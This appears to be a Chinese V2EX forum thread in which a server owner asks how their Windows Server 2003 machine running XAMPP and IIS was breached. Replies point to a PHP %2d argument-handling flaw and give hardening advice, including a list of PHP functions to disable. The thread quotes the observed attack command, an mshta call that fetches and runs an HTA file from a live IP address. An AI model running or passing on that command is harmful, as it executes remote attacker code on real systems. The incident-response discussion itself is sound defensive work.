是谁用什么方式攻击了我的服务器呢?

12 天前
 wangybsyuct

服务器(windows server 2003),阿里云的,运行了 xampp ,也运行了 iis (为了兼容以前的程序)。 服务器是给自己另外的一个服务器提供数据,是使用的 web 接口。 刚刚远程登录,上面出现了 5 个异常窗口,标题是“http://88.218.76.13/d3.hta”,明显是被攻击了,之前没有遇到过这种,窗口是使用“mshta http://88.218.76.13/d3.hta”,查到每个窗口对应一个进程的父进程是独立的 cmd ,一共 5 个 cmd ,进程还都在,但是这 5 个 cmd 的父进程不在了,无法进一步追查。看了 apache 日志和 iid 日志,里面没有找到关于 88.218.76.13 的信息。这个窗口里面的源代码是

<HTML><HEAD> <META content="text/html; charset=gb2312" http-equiv=Content-Type></HEAD> <BODY></BODY></HTML>”

我想先将 mshta 删除掉,但是还是不知道是哪里出现了问题,想追查漏洞的出处,如何追查呢? 所有的程序都是我自己写的,接口出现问题的可能性很小。

2491 次点击
所在节点    信息安全
26 条回复
ShinichiYao
11 天前
换成最新 Windows 也没用,这个漏洞只有更新 PHP 到 8.1.29, 8.2.20, 8.3.8 才能彻底堵住,XAMPP 是肯定不能再用了
sampeng
11 天前
win server 2003 ? xanmp ? iis ?你搁这叠 buf 呢。。。

既然是阿里云,就要养成做好环境就打包镜像为镜像,坏了随时拉一个新的环境起来。干干净净。被黑了一般只有一条路:重开一台机器重新搞环境。不要相信自己能去干净。我之前也这么想,md ,这破玩意 1 年后在公司里有 tm 炸了。。
sampeng
11 天前
哦。。我突然反应过来。。你为毛要把机器暴露在外网呢。。。只暴露 443 端口不就完了?有且只有两类漏洞可以利用:iis/apache+自己开发的接口。。起个 nginx 档在前面只暴露 443 端口。。完事= =!
ShinichiYao
10 天前
@sampeng 这个漏洞根本不需要暴露外网,只要你开了 80 或者 443 就可以攻击
wangybsyuct
10 天前
@sampeng
@ShinichiYao
这个攻击,只要符合条件,1.中文操作系统,2.php 版本是最高的。这个是利用 php 的漏洞,处理%2d 字符的漏洞,是没法儿预防的,开了 80 或者 443 都可以攻击。如果 php 无法升级,暂时可以用 Rewrite 重定向处理,然后屏蔽掉 system,exec,shell_exec,passthru,popen 加固一下。
sampeng
10 天前
@wangybsyuct 不是,你没明白我的意思。我的意思是。首先,缩小攻击面。只有 80 和 443.这样你就只要考虑 php 漏洞这一项了。其他什么乱七八糟的都不需要考虑。就围绕 443 解决可能出现的漏洞就好了。没有 100%能攻破的漏洞,只要你知道是怎么进来的。那就见缝拆招好了。不知道?重写部分危险接口。。完事。。哈哈哈

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1050981

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX